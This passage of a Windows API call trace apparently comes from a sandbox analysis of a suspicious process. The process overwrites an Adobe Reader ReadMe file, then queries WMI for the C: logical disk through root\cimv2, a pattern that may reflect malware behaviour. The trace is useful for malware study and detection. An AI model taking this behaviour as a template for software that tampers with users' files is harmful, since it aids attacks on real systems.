Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmej.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x598 [0201.665] GetFileType (hFile=0x598) returned 0x1 [0201.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0201.665] GetFileType (hFile=0x598) returned 0x1 [0201.665] WriteFile (in: hFile=0x598, lpBuffer=0x3754698*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x3754698*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0201.666] CloseHandle (hObject=0x598) returned 1 [0201.666] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0201.666] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0201.667] CoTaskMemFree (pv=0xbed438) [0201.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0201.667] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0201.667] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0201.667] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0201.667] IUnknown:Release (This=0xb51e34) returned 0x1 [0201.668] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x60278f0) returned 0x0 [0201.668] WbemDefPath:IUnknown:QueryInterface (in: This=0x60278f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0201.668] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60278f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x6029f10) returned 0x0 [0201.668] WbemDefPath:IUnknown:Release (This=0x60278f0) returned 0x0 [0201.668] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x6029f10) returned 0x0 [0201.668] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0201.668] WbemDefPath:IUnknown:AddRef (This=0x6029f10) returned 0x3 [0201.668] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0201.668] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0201.668] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0xbb5968) returned 0x0 [0201.668] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5968, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0201.669] WbemDefPath:IUnknown:Release (This=0xbb5968) returned 0x3 [0201.669] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0201.669] CoGetContextToken (in: pToken=0x8f6dee8 | out: pToken=0x8f6dee8) returned 0x0 [0201.669] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0201.669] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0201.669] WbemDefPath:IUnknown:Release (This=0x6029f10) returned 0x2 [0201.669] WbemDefPath:IUnknown:Release (This=0x6029f10) returned 0x1 [0201.669] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0201.669] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0201.669] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x6029f10) returned 0x0 [0201.669] WbemDefPath:IUnknown:AddRef (This=0x6029f10) returned 0x3 [0201.669] WbemDefPath:IUnknown:Release (This=0x6029f10) returned 0x2 [0201.669] WbemDefPath:IWbemPath:SetText (This=0x6029f10, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0201.669] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f10, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0201.669] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0201.669] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0201.669] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029f10, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0201.669] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f10, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0201.669] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029f10, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0201.669] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029f10, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0201.669] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f10, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0201.669] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0201.669] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0201.669] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0201.669] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0201.669] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0201.670] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0201.670] IUnknown:Release (This=0xb51e34) returned 0x1 [0201.670] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x6027940) returned 0x0 [0201.670] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027940, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0201.670] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027940, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6029f80) returned 0x0 [0201.670] WbemDefPath:IUnknown:Release (This=0x6027940) returned 0x0 [0201.670] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6029f80) returned 0x0 [0201.670] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0201.671] WbemDefPath:IUnknown:AddRef (This=0x6029f80) returned 0x3 [0201.671] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0201.671] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0201.671] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0xbb5868) returned 0x0 [0201.671] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5868, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0201.671] WbemDefPath:IUnknown:Release (This=0xbb5868) returned 0x3 [0201.671] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0201.671] CoGetContextToken (in: pToken=0x8f6de30 | out: pToken=0x8f6de30) returned 0x0 [0201.671] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0201.671] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0201.671] WbemDefPath:IUnknown:Release (This=0x6029f80) returned 0x2 [0201.671] WbemDefPath:IUnknown:Release (This=0x6029f80) returned 0x1 [0201.671] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0201.671] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0201.671] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6029f80) returned 0x0 [0201.671] WbemDefPath:IUnknown:AddRef (This=0x6029f80) returned 0x3 [0201.671] WbemDefPath:IUnknown:Release (This=0x6029f80) returned 0x2 [0201.671] WbemDefPath:IWbemPath:SetText (This=0x6029f80, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0201.671] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f80, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0201.671] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0201.671] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0201.671] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0201.671] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0201.672] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0201.672] IUnknown:Release (This=0xb51e34) returned 0x1 [0201.672] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x6024890) returned 0x0 [0201.672] WbemLocator:IUnknown:QueryInterface (in: This=0x6024890, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0201.672] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024890, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x60276e0) returned 0x0 [0201.672] WbemLocator:IUnknown:Release (This=0x6024890) returned 0x0 [0201.672] WbemLocator:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x60276e0) returned 0x0 [0201.673] WbemLocator:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0201.673] WbemLocator:IUnknown:AddRef (This=0x60276e0) returned 0x3 [0201.673] WbemLocator:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0201.673] WbemLocator:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0201.673] WbemLocator:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0201.673] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0201.673] CoGetContextToken (in: pToken=0x8f6e110 | out: pToken=0x8f6e110) returned 0x0 [0201.673] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0201.673] WbemLocator:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0201.673] WbemLocator:IUnknown:Release (This=0x60276e0) returned 0x2 [0201.673] WbemLocator:IUnknown:Release (This=0x60276e0) returned 0x1 [0201.673] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0201.673] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0201.673] WbemLocator:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x60276e0) returned 0x0 [0201.673] WbemLocator:IUnknown:AddRef (This=0x60276e0) returned 0x3 [0201.673] WbemLocator:IUnknown:Release (This=0x60276e0) returned 0x2 [0201.673] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f80, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0201.673] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0201.673] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0201.673] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x60278e0) returned 0x0 [0201.673] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60278e0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x6033584) returned 0x0 [0202.136] WbemLocator:IUnknown:QueryInterface (in: This=0x6033584, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5b404) returned 0x0 [0202.136] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b404, pProxy=0x6033584, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0202.136] WbemLocator:IUnknown:Release (This=0xb5b404) returned 0x1 [0202.136] WbemLocator:IUnknown:QueryInterface (in: This=0x6033584, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5b424) returned 0x0 [0202.137] WbemLocator:IUnknown:QueryInterface (in: This=0x6033584, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5b404) returned 0x0 [0202.137] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b404, pProxy=0x6033584, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0202.137] WbemLocator:IUnknown:Release (This=0xb5b404) returned 0x2 [0202.137] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x1 [0202.137] CoTaskMemFree (pv=0xbd4a38) [0202.137] WbemLocator:IUnknown:Release (This=0x60278e0) returned 0x0 [0202.137] WbemLocator:IUnknown:QueryInterface (in: This=0x6033584, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5b424) returned 0x0 [0202.137] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0202.138] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0202.138] WbemLocator:IUnknown:AddRef (This=0xb5b424) returned 0x3 [0202.138] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, 